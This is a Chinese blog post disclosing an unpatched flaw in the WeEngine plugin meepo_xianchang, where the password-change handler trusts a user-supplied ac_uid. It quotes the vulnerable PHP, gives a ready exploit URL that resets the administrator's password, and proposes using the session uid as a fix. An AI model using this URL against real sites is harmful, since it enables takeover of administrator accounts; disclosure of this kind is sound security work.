UU Blog

微擎插件米波现场修改任意账户密码漏洞 0day

漏洞成因

微擎米波现场插件存在任意修改密码漏洞。

  • meepo_xianchang/inc/web/account_manage.inc.php

143-193行,普通用户登录后,修改密码功能,ac_uid是可以外部传入的。只要传入其它用户的UID,即可修改掉其它用户的密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
elseif($op=='account_mima'){
load()->model('user');
$account_uid = intval($_GPC['ac_uid']);
if(empty($account_uid)){
web_message('错误');
}
$account_user = user_single($account_uid);
if(empty($account_user)){
web_message('用户不存在或是已经被删除!',referer(),'error');
}
if(checksubmit('user_submit')) {
$record = array();
if (!empty($account_user['username'])) {
$record['username'] = $account_user['username'];
}
if (!empty($_GPC['password'])) {
$password = trim($_GPC['password']);
$record['password'] = user_hash($password, $account_user['salt']);
}else{
web_message('必须输入新密码,且密码长度不少于8位。');
}
if (!empty($account_user['lastvisit'])) {
$record['lastvisit'] = (strlen($account_user['lastvisit']) == 10) ? $account_user['lastvisit'] : strtotime($account_user['lastvisit']);
}
if (!empty($account_user['lastip'])) {
$record['lastip'] = $account_user['lastip'];
}
if (isset($account_user['joinip'])) {
$record['joinip'] = $account_user['joinip'];
}
if (isset($account_user['remark'])) {
$record['remark'] = $account_user['remark'];
}
if (isset($account_user['type'])) {
$record['type'] = $account_user['type'];
}
if (isset($account_user['status'])) {
$status = intval($account_user['status']);
$record['status'] = $status;
}
if (isset($account_user['groupid'])) {
$record['groupid'] = $account_user['groupid'];
}
if (isset($account_user['starttime'])) {
$record['starttime'] = $account_user['starttime'];
}
if (isset($account_user['endtime'])) {
$record['endtime'] = $account_user['endtime'];
}
pdo_update('users', $record, array('uid' =>$account_uid));
web_message('密码修改成功!',referer(),'success');
}

问题复现

传入ac_uid=1 即可改掉管理密码

1
/web/index.php?c=site&a=entry&ac_uid=1&op=account_mima&do=account_manage&m=meepo_xianchang

修补方案

获取当前登录用户session中保存的uid即可,不必外部传入。

给作者打一针鸡血